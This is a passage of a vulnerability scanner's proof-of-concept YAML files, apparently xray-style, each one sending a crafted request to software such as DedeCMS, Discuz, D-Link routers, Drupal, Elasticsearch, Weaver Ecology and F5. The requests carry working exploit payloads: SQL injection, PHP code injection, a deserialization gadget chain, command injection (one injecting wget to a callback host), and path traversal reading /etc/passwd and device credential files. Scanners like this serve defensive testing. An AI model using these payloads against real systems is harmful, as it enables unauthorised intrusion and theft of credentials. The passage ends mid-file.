-------------------------------------------------------------------------------- 1 | name: poc-yaml-dedecms-cve-2018-6910 2 | rules: 3 | - method: GET 4 | path: /include/downmix.inc.php 5 | expression: | 6 | response.status == 200 && response.body.bcontains(bytes("Fatal error")) && response.body.bcontains(bytes("downmix.inc.php")) && response.body.bcontains(bytes("Call to undefined function helper()")) 7 | detail: 8 | author: PickledFish(https://github.com/PickledFish) 9 | links: 10 | - https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.md -------------------------------------------------------------------------------- /pkg/pocs/dedecms-cve-2018-7700-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dedecms-cve-2018-7700-rce 2 | set: 3 | r: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: GET 6 | path: >- 7 | /tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5{{r}};{/dede:field} 8 | follow_redirects: true 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes(md5(string(r)))) 11 | detail: 12 | author: harris2015(https://github.com/harris2015) 13 | Affected Version: "V5.7SP2正式版(2018-01-09)" 14 | links: 15 | - https://xz.aliyun.com/t/2224 16 | -------------------------------------------------------------------------------- /pkg/pocs/dedecms-guestbook-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dedecms-guestbook-sqli 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: /plus/guestbook.php 7 | follow_redirects: true 8 | expression: | 9 | response.status == 200 10 | search: action=admin&id=(?P\d{1,20}) 11 | - method: GET 12 | path: /plus/guestbook.php?action=admin&job=editok&id={{articleid}}&msg=',msg=@`'`,msg=(selecT md5({{r}})),email=' 13 | follow_redirects: true 14 | expression: | 15 | response.status == 200 
16 | - method: GET 17 | path: /plus/guestbook.php 18 | follow_redirects: true 19 | expression: | 20 | response.status == 200 && response.body.bcontains(bytes(md5(string(r)))) 21 | 22 | detail: 23 | author: harris2015(https://github.com/harris2015) 24 | Affected Version: "5.7" 25 | links: 26 | - https://blog.csdn.net/god_7z1/article/details/8180454 27 | -------------------------------------------------------------------------------- /pkg/pocs/dedecms-membergroup-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dedecms-membergroup-sqli 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: >- 7 | /member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5({{r}})+--+@`'` 8 | follow_redirects: true 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes(md5(string(r)))) 11 | detail: 12 | author: harris2015(https://github.com/harris2015) 13 | Affected Version: "5.6,5.7" 14 | links: 15 | - http://www.dedeyuan.com/xueyuan/wenti/1244.html 16 | -------------------------------------------------------------------------------- /pkg/pocs/dedecms-url-redirection.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dedecms-url-redirection 2 | rules: 3 | - method: GET 4 | path: >- 5 | /plus/download.php?open=1&link=aHR0cHM6Ly93d3cuZHUxeDNyMTIuY29t 6 | follow_redirects: false 7 | expression: > 8 | response.status == 302 && response.headers["location"] == "https://www.du1x3r12.com" 9 | detail: 10 | author: cc_ci(https://github.com/cc8ci) 11 | Affected Version: "V5.7 sp1" 12 | links: 13 | - https://blog.csdn.net/ystyaoshengting/article/details/82734888 -------------------------------------------------------------------------------- /pkg/pocs/discuz-ml3x-cnvd-2019-22239.yml: -------------------------------------------------------------------------------- 1 | name: 
poc-yaml-discuz-ml3x-cnvd-2019-22239 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: /forum.php 7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 10 | search: cookiepre = '(?P[\w_]+)' 11 | - method: GET 12 | path: /forum.php 13 | headers: 14 | Cookie: "{{token}}language=sc'.print(md5({{r1}})).'" 15 | follow_redirects: false 16 | expression: | 17 | response.status == 200 && response.body.bcontains(bytes(md5(string(r1)))) 18 | detail: 19 | author: X.Yang 20 | Discuz_version: Discuz!ML 3.x 21 | links: 22 | - https://www.cnvd.org.cn/flaw/show/CNVD-2019-22239 23 | -------------------------------------------------------------------------------- /pkg/pocs/discuz-v72-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-discuz-v72-sqli 2 | rules: 3 | - method: GET 4 | path: >- 5 | /faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 6 | follow_redirects: false 7 | expression: > 8 | response.status == 200 && response.body.bcontains(b"81dc9bdb52d04dc20036dbd8313ed055") && response.body.bcontains(b"Discuz! 
info: MySQL Query Error") 9 | detail: 10 | author: leezp 11 | Affected Version: "discuz <=v7.2" 12 | vuln_url: "/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20" 13 | links: 14 | - https://blog.csdn.net/weixin_40709439/article/details/82780606 15 | -------------------------------------------------------------------------------- /pkg/pocs/discuz-wechat-plugins-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-discuz-wechat-plugins-unauth 2 | rules: 3 | - method: GET 4 | path: '/plugin.php?id=wechat:wechat&ac=wxregister' 5 | follow_redirects: false 6 | expression: | 7 | response.status == 302 && "set-cookie" in response.headers && response.headers["set-cookie"].contains("auth") && "location" in response.headers && response.headers["location"].contains("wsq.discuz.com") 8 | detail: 9 | author: JrD 10 | links: 11 | - https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI 12 | -------------------------------------------------------------------------------- /pkg/pocs/discuz-wooyun-2010-080723.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-discuz-wooyun-2010-080723 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: >- 7 | /viewthread.php?tid=10 8 | headers: 9 | Cookie: GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Bsearcharray%5D=/.*/eui; GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Breplacearray%5D=print_r(md5({{rand}})); 10 | follow_redirects: false 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) 13 | detail: 14 | version: Discuz 7.x/6.x 15 | author: Loneyer 16 | links: 17 | - https://github.com/vulhub/vulhub/tree/master/discuz/wooyun-2010-080723 18 | -------------------------------------------------------------------------------- /pkg/pocs/dlink-850l-info-leak.yml: -------------------------------------------------------------------------------- 1 | name: 
poc-yaml-dlink-850l-info-leak 2 | rules: 3 | - method: POST 4 | path: /hedwig.cgi 5 | headers: 6 | Content-Type: text/xml 7 | Cookie: uid=R8tBjwtFc8 8 | body: |- 9 | ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml 10 | follow_redirects: false 11 | expression: > 12 | response.status == 200 && response.body.bcontains(b"") && response.body.bcontains(b"") && response.body.bcontains(b"OK") 13 | detail: 14 | author: cc_ci(https://github.com/cc8ci) 15 | Affected Version: "Dir-850L" 16 | links: 17 | - https://xz.aliyun.com/t/2941 -------------------------------------------------------------------------------- /pkg/pocs/dlink-cve-2019-16920-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dlink-cve-2019-16920-rce 2 | set: 3 | reverse: newReverse() 4 | reverseURL: reverse.url 5 | rules: 6 | - method: POST 7 | path: /apply_sec.cgi 8 | headers: 9 | Content-Type: application/x-www-form-urlencoded 10 | body: >- 11 | html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20{{reverseURL}} 12 | follow_redirects: true 13 | expression: | 14 | response.status == 200 && reverse.wait(5) 15 | detail: 16 | author: JingLing(https://hackfun.org/) 17 | links: 18 | - https://www.anquanke.com/post/id/187923 19 | - https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3 20 | -------------------------------------------------------------------------------- /pkg/pocs/dlink-cve-2019-17506.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dlink-cve-2019-17506 2 | rules: 3 | - method: POST 4 | path: /getcfg.php 5 | headers: 6 | Content-Type: application/x-www-form-urlencoded 7 | body: SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a 8 | follow_redirects: false 9 | expression: > 10 | response.status == 200 && response.body.bcontains(b"") && response.body.bcontains(b"") 11 | detail: 12 | author: 
l1nk3r,Huasir(https://github.com/dahua966/) 13 | links: 14 | - https://xz.aliyun.com/t/6453 15 | -------------------------------------------------------------------------------- /pkg/pocs/dlink-cve-2020-9376-dump-credentials.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dlink-cve-2020-9376-dump-credentials 2 | rules: 3 | - method: POST 4 | path: /getcfg.php 5 | headers: 6 | Content-Type: application/x-www-form-urlencoded 7 | body: >- 8 | SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1 9 | expression: > 10 | response.status == 200 && response.body.bcontains(b"Admin") && response.body.bcontains(b"") && response.body.bcontains(b"") 11 | detail: 12 | author: x1n9Qi8 13 | Affected Version: "Dlink DIR-610" 14 | links: 15 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9376 -------------------------------------------------------------------------------- /pkg/pocs/dlink-dsl-2888a-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dlink-dsl-2888a-rce 2 | rules: 3 | - method: GET 4 | path: /page/login/login.html 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.content_type.contains("text/html") && response.body.bcontains(b"var ModelName=\"DSL-2888A\";") 8 | - method: POST 9 | path: / 10 | body: username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b 11 | headers: 12 | Content-Type: application/x-www-form-urlencoded 13 | follow_redirects: false 14 | expression: | 15 | response.status == 302 && response.headers["location"] == "/page/login/login_fail.html" 16 | - method: GET 17 | path: /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=id 18 | follow_redirects: false 19 | expression: | 20 | response.status == 200 && response.content_type.contains("text/html") && response.body.bcontains(b"uid=0(admin) gid=0(admin)") 21 | detail: 22 | author: mvhz81 23 | info: dlink-dsl-2888a 
CVE-2020-24579(Insufficient Authentication) + Hidden Functionality (CVE-2020-24581) = RCE 24 | links: 25 | - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/ 26 | -------------------------------------------------------------------------------- /pkg/pocs/docker-api-unauthorized-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-docker-api-unauthorized-rce 2 | rules: 3 | - method: GET 4 | path: /info 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"KernelVersion") && response.body.bcontains(b"RegistryConfig") && response.body.bcontains(b"DockerRootDir") 8 | 9 | detail: 10 | author: j4ckzh0u(https://github.com/j4ckzh0u) 11 | links: 12 | - https://github.com/vulhub/vulhub/tree/master/docker/unauthorized-rce 13 | -------------------------------------------------------------------------------- /pkg/pocs/docker-registry-api-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-docker-registry-api-unauth 2 | rules: 3 | - method: GET 4 | path: /v2/ 5 | follow_redirects: false 6 | expression: > 7 | response.status == 200 && "docker-distribution-api-version" in response.headers && response.headers["docker-distribution-api-version"].contains("registry/2.0") 8 | - method: GET 9 | path: /v2/_catalog 10 | follow_redirects: false 11 | expression: > 12 | response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"repositories") 13 | detail: 14 | author: p0wd3r 15 | links: 16 | - http://www.polaris-lab.com/index.php/archives/253/ 17 | -------------------------------------------------------------------------------- /pkg/pocs/dotnetcms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dotnetcms-sqli 2 | set: 3 | r1: randomInt(800000000, 
1000000000) 4 | r2: randomInt(1, 100) 5 | rules: 6 | - method: GET 7 | path: /user/City_ajax.aspx 8 | follow_redirects: false 9 | expression: | 10 | response.status == 200 11 | - method: GET 12 | path: >- 13 | /user/City_ajax.aspx?CityId={{r2}}'union%20select%20sys.fn_sqlvarbasetostr(HashBytes('MD5','{{r1}}')),2-- 14 | follow_redirects: false 15 | expression: | 16 | response.status == 200 && response.body.bcontains(bytes(md5(string(r1)))) 17 | detail: 18 | Affected Version: "v1.0~v2.0" 19 | links: 20 | - https://www.cnblogs.com/rebeyond/p/4951418.html 21 | - http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0150742 22 | -------------------------------------------------------------------------------- /pkg/pocs/draytek-cve-2020-8515.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-draytek-cve-2020-8515 2 | rules: 3 | - method: POST 4 | path: /cgi-bin/mainfunction.cgi 5 | headers: 6 | Content-Type: text/plain; charset=UTF-8 7 | body: >- 8 | action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2f/etc/passwd%26id%26pwd&loginUser=a&loginPwd=a 9 | expression: > 10 | response.status == 200 && response.body.bcontains(b"uid") && response.body.bcontains(b"gid") && "root:[x*]:0:0:".bmatches(response.body) 11 | detail: 12 | author: Soveless(https://github.com/Soveless) 13 | Affected Version: "Vigor2960, Vigor300B, Vigor3900 < v1.5.1, VigorSwitch20P2121, VigorSwitch20G1280, VigorSwitch20P1280, VigorSwitch20G2280, VigorSwitch20P2280 <= v2.3.2" 14 | links: 15 | - https://github.com/imjdl/CVE-2020-8515-PoC 16 | -------------------------------------------------------------------------------- /pkg/pocs/druid-monitor-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-druid-monitor-unauth 2 | rules: 3 | - method: GET 4 | path: /druid/index.html 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b"Druid Stat Index") && 
response.body.bcontains(b"DruidVersion") && response.body.bcontains(b"DruidDrivers") 7 | detail: 8 | author: met7or 9 | links: 10 | - https://github.com/alibaba/druid 11 | -------------------------------------------------------------------------------- /pkg/pocs/drupal-cve-2014-3704-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-drupal-cve-2014-3704-sqli 2 | rules: 3 | - method: POST 4 | path: /?q=node&destination=node 5 | body: >- 6 | pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or 7 | updatexml(0x23,concat(1,md5(666)),1)%23]=bob&name[0]=a 8 | follow_redirects: false 9 | expression: | 10 | response.status == 500 && response.body.bcontains(b"PDOException") && response.body.bcontains(b"fae0b27c451c728867a567e8c1bb4e53") 11 | detail: 12 | Affected Version: "Drupal < 7.32" 13 | links: 14 | - https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2014-3704 -------------------------------------------------------------------------------- /pkg/pocs/drupal-cve-2019-6340.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-drupal-cve-2019-6340 2 | set: 3 | host: request.url.host 4 | r1: randomLowercase(4) 5 | r2: randomLowercase(4) 6 | rules: 7 | - method: POST 8 | path: /node/?_format=hal_json 9 | headers: 10 | Content-Type: application/hal+json 11 | Accept: '*/*' 12 | body: | 13 | { 14 | "link": [ 15 | { 16 | "value": "link", 17 | "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:10:\"{{r1}}%%{{r2}}\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"printf\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" 18 | } 19 | ], 20 | "_links": { 21 | "type": { 
22 | "href": "http://{{host}}/rest/type/shortcut/default" 23 | } 24 | } 25 | } 26 | follow_redirects: true 27 | expression: | 28 | response.status == 403 && response.body.bcontains(bytes(r1 + "%" + r2)) 29 | detail: 30 | author: thatqier 31 | links: 32 | - https://github.com/jas502n/CVE-2019-6340 33 | - https://github.com/knqyf263/CVE-2019-6340 -------------------------------------------------------------------------------- /pkg/pocs/duomicms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-duomicms-sqli 2 | rules: 3 | - method: GET 4 | path: >- 5 | /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(2000000005))) 6 | follow_redirects: false 7 | expression: | 8 | response.body.bcontains(b"fc9bdfb86bae5c322bae5acd78760935") 9 | detail: 10 | author: hanxiansheng26(https://github.com/hanxiansheng26) 11 | Affected Version: "duomicms<3.0" 12 | links: 13 | - https://xz.aliyun.com/t/2828 -------------------------------------------------------------------------------- /pkg/pocs/dvr-cve-2018-9995.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dvr-cve-2018-9995 2 | rules: 3 | - method: GET 4 | path: >- 5 | /device.rsp?opt=user&cmd=list 6 | headers: 7 | Cookie: uid=admin 8 | follow_redirects: true 9 | expression: > 10 | response.status == 200 && response.body.bcontains(bytes("\"uid\":")) && response.body.bcontains(b"playback") 11 | detail: 12 | author: cc_ci(https://github.com/cc8ci) 13 | Affected Version: "DVR" 14 | links: 15 | - https://s.tencent.com/research/bsafe/474.html -------------------------------------------------------------------------------- /pkg/pocs/ecology-filedownload-directory-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecology-filedownload-directory-traversal 2 | rules: 3 | - method: GET 4 | path: 
/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"/weaver/") 8 | detail: 9 | author: l1nk3r 10 | links: 11 | - https://www.weaver.com.cn/cs/securityDownload.asp 12 | -------------------------------------------------------------------------------- /pkg/pocs/ecology-javabeanshell-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecology-javabeanshell-rce 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: POST 7 | path: /weaver/bsh.servlet.BshServlet 8 | body: >- 9 | bsh.script=print%28{{r1}}*{{r2}}%29&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw 10 | follow_redirects: false 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 13 | detail: 14 | author: l1nk3r 15 | links: 16 | - https://www.weaver.com.cn/cs/securityDownload.asp -------------------------------------------------------------------------------- /pkg/pocs/ecology-springframework-directory-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecology-springframework-directory-traversal 2 | rules: 3 | - method: GET 4 | path: /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"/weaver/") 8 | detail: 9 | author: l1nk3r 10 | links: 11 | - https://www.weaver.com.cn/cs/securityDownload.asp 12 | -------------------------------------------------------------------------------- /pkg/pocs/ecology-syncuserinfo-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecology-syncuserinfo-sqli 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: GET 7 | path: >- 8 | 
/mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str({{r1}}*{{r2}}),null 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 12 | detail: 13 | author: MaxSecurity(https://github.com/MaxSecurity) 14 | links: 15 | - https://www.weaver.com.cn/ 16 | -------------------------------------------------------------------------------- /pkg/pocs/ecshop-cnvd-2020-58823-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecshop-cnvd-2020-58823-sqli 2 | set: 3 | r1: randomInt(40000, 44800) 4 | rules: 5 | - method: POST 6 | path: /delete_cart_goods.php 7 | body: id=0||(updatexml(1,concat(0x7e,(select%20md5({{r1}})),0x7e),1)) 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 10 | detail: 11 | author: 凉风(http://webkiller.cn/) 12 | links: 13 | - https://mp.weixin.qq.com/s/1t0uglZNoZERMQpXVVjIPw -------------------------------------------------------------------------------- /pkg/pocs/elasticsearch-cve-2014-3120.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-elasticsearch-cve-2014-3120 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | r1: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: /test/test1/123 8 | headers: 9 | Content-Type: application/json 10 | body: | 11 | { 12 | "name": "test" 13 | } 14 | expression: | 15 | response.status == 201 || response.status == 200 16 | - method: POST 17 | path: /_search 18 | headers: 19 | Content-Type: application/json 20 | body: |- 21 | { 22 | "size": 1, 23 | "query": { 24 | "filtered": { 25 | "query": { 26 | "match_all": { 27 | } 28 | } 29 | } 30 | }, 31 | "script_fields": { 32 | "command": { 33 | "script": "{{r}}+{{r1}}" 34 | } 35 | } 36 | } 37 | follow_redirects: true 38 | expression: | 39 | response.status == 200 && 
response.body.bcontains(bytes(string(r + r1))) 40 | 41 | detail: 42 | author: suancaiyu、violin 43 | elasticsearch: v1.1.1 44 | links: 45 | - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120 46 | -------------------------------------------------------------------------------- /pkg/pocs/elasticsearch-cve-2015-1427.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-elasticsearch-cve-2015-1427 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: POST 7 | path: /test/test 8 | headers: 9 | Content-Type: application/json 10 | body: | 11 | { 12 | "name": "test" 13 | } 14 | expression: | 15 | response.status == 201 16 | - method: POST 17 | path: /_search 18 | headers: 19 | Content-Type: application/json 20 | body: | 21 | { 22 | "size":1, 23 | "script_fields":{ 24 | "lupin":{ 25 | "lang":"groovy", 26 | "script":"{{r1}}*{{r2}}" 27 | } 28 | } 29 | } 30 | expression: | 31 | response.status == 200 && response.content_type.icontains("json") && response.body.bcontains(bytes(string(r1 * r2))) 32 | detail: 33 | author: pululin(https://github.com/pululin) 34 | links: 35 | - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-1427 -------------------------------------------------------------------------------- /pkg/pocs/elasticsearch-cve-2015-3337-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-elasticsearch-cve-2015-3337-lfi 2 | rules: 3 | - method: GET 4 | path: /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd 5 | expression: | 6 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 7 | 8 | detail: 9 | author: X.Yang 10 | links: 11 | - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-3337 12 | -------------------------------------------------------------------------------- /pkg/pocs/elasticsearch-unauth.yml: 
-------------------------------------------------------------------------------- 1 | name: poc-yaml-elasticsearch-unauth 2 | rules: 3 | - method: GET 4 | path: / 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"You Know, for Search") 8 | - method: GET 9 | path: /_cat 10 | follow_redirects: false 11 | expression: | 12 | response.status == 200 && response.body.bcontains(b"/_cat/master") 13 | detail: 14 | author: p0wd3r 15 | links: 16 | - https://yq.aliyun.com/articles/616757 17 | -------------------------------------------------------------------------------- /pkg/pocs/etcd-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-etcd-unauth 2 | set: 3 | r1: randomLowercase(32) 4 | r2: randomLowercase(32) 5 | r3: randomLowercase(32) 6 | rules: 7 | - method: PUT 8 | path: /v2/keys/{{r1}}?dir=true 9 | follow_redirects: false 10 | expression: | 11 | response.status == 201 12 | - method: PUT 13 | path: /v2/keys/{{r1}}/{{r2}}?prevExist=false 14 | headers: 15 | Content-Type: application/x-www-form-urlencoded 16 | body: value={{r3}} 17 | follow_redirects: false 18 | expression: | 19 | response.status == 201 20 | - method: GET 21 | path: /v2/keys/{{r1}}/{{r2}}?quorum=false&recursive=false&sorted=false 22 | follow_redirects: false 23 | expression: | 24 | response.status == 200 && response.body.bcontains(bytes(r3)) 25 | 26 | detail: 27 | author: j4ckzh0u(https://github.com/j4ckzh0u) 28 | links: 29 | - https://www.freebuf.com/news/196993.html 30 | -------------------------------------------------------------------------------- /pkg/pocs/etouch-v2-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-etouch-v2-sqli 2 | rules: 3 | - method: GET 4 | path: >- 5 | 
/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)' 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"c4ca4238a0b923820dcc509a6f75849b") 8 | detail: 9 | author: MaxSecurity(https://github.com/MaxSecurity) 10 | links: 11 | - https://github.com/mstxq17/CodeCheck/ 12 | - https://www.anquanke.com/post/id/168991 -------------------------------------------------------------------------------- /pkg/pocs/f5-tmui-cve-2020-5902-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-f5-tmui-cve-2020-5902-rce 2 | rules: 3 | - method: POST 4 | path: >- 5 | /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp 6 | headers: 7 | Content-Type: application/x-www-form-urlencoded 8 | body: fileName=%2Fetc%2Ff5-release 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 && response.body.bcontains(b"BIG-IP release") 12 | detail: 13 | author: Jing Ling 14 | links: 15 | - https://support.f5.com/csp/article/K52145254 16 | - https://github.com/rapid7/metasploit-framework/pull/13807/files 17 | -------------------------------------------------------------------------------- /pkg/pocs/fangweicms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-fangweicms-sqli 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5({{rand}})%29%23 7 | expression: | 8 | response.body.bcontains(bytes(md5(string(rand)))) 9 | detail: 10 | author: Rexus 11 | Affected Version: "4.3" 12 | links: 13 | - http://www.wujunjie.net/index.php/2015/08/02/%E6%96%B9%E7%BB%B4%E5%9B%A2%E8%B4%AD4-3%E6%9C%80%E6%96%B0%E7%89%88sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/ 14 | 
-------------------------------------------------------------------------------- /pkg/pocs/feifeicms-lfr.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-feifeicms-lfr 2 | rules: 3 | - method: GET 4 | path: /index.php?s=Admin-Data-down&id=../../Conf/config.php 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b"") && response.body.bcontains(b"") 8 | detail: 9 | author: l1nk3r(http://www.lmxspace.com/) 10 | links: 11 | - http://foreversong.cn/archives/1378 12 | -------------------------------------------------------------------------------- /pkg/pocs/flink-jobmanager-cve-2020-17519-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-flink-jobmanager-cve-2020-17519-lfi 2 | rules: 3 | - method: GET 4 | path: /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd 5 | expression: | 6 | response.status == 200 && "^root:[x*]:0:0:".bmatches(response.body) 7 | detail: 8 | author: MaxSecurity(https://github.com/MaxSecurity) 9 | links: 10 | - https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519 11 | -------------------------------------------------------------------------------- /pkg/pocs/fortigate-cve-2018-13379-readfile.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-fortigate-cve-2018-13379-readfile 2 | 3 | rules: 4 | - method: GET 5 | path: "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" 6 | headers: 7 | Content-Type: application/x-www-form-urlencoded 8 | follow_redirects: true 9 | expression: response.body.bcontains(bytes("fgt_lang")) && response.body.bcontains(bytes("Forticlient")) 10 | detail: 11 | author: tom0li(https://tom0li.github.io/) 12 | links: 13 | - https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html 14 | 
-------------------------------------------------------------------------------- /pkg/pocs/frp-dashboard-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-frp-dashboard-unauth 2 | groups: 3 | unauth: 4 | - method: GET 5 | path: /api/proxy/tcp 6 | follow_redirects: true 7 | expression: | 8 | response.status == 200 && response.content_type.contains("text/plain") && response.body.bcontains(b"proxies") 9 | defaultpassword: 10 | - method: GET 11 | path: /api/proxy/tcp 12 | follow_redirects: false 13 | expression: | 14 | response.status == 401 && response.body.bcontains(b"Unauthorized") 15 | - method: GET 16 | path: /api/proxy/tcp 17 | headers: 18 | Authorization: Basic YWRtaW46YWRtaW4= 19 | follow_redirects: false 20 | expression: | 21 | response.status == 200 && response.content_type.contains("text/plain") && response.body.bcontains(b"proxies") 22 | -------------------------------------------------------------------------------- /pkg/pocs/gilacms-cve-2020-5515.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-gilacms-cve-2020-5515 2 | set: 3 | r1: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /admin/sql?query=SELECT%20md5({{r1}}) 7 | expression: | 8 | 